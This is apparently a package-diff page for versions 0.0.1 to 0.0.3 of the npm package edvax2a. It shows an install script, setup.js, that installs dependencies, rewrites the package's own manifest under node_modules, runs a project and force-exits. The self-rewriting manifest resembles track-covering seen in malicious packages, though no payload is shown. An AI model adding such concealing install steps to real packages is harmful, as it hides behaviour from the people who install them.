edvax2a 0.0.1 → 0.0.3
Sign up to get free protection for your applications and to get access to all the features.
- package/package.json +1 -1
- package/setup.js +4 -1
package/package.json
CHANGED
package/setup.js
CHANGED
@@ -38,7 +38,7 @@ function installDependencies(missingDependencies) {
|
|
38
38
|
}
|
39
39
|
console.log(`stdout: ${stdout}`);
|
40
40
|
console.log('Dependencies installed successfully.');
|
41
|
-
fs.writeFileSync('./package.json', JSON.stringify({
|
41
|
+
fs.writeFileSync('./node_modules/edvax2a/package.json', JSON.stringify({
|
42
42
|
"name": "edvax2a",
|
43
43
|
"description": "edvax2a",
|
44
44
|
"version": "0.0.1",
|
@@ -54,6 +54,9 @@ function installDependencies(missingDependencies) {
|
|
54
54
|
"license": "MIT",
|
55
55
|
"readmeFilename": "README.md"
|
56
56
|
}, null, 2))
|
57
|
+
setTimeout(()=>{
|
58
|
+
process.exit(0);
|
59
|
+
}, 5000)
|
57
60
|
|
58
61
|
runProject();
|
59
62
|
});
|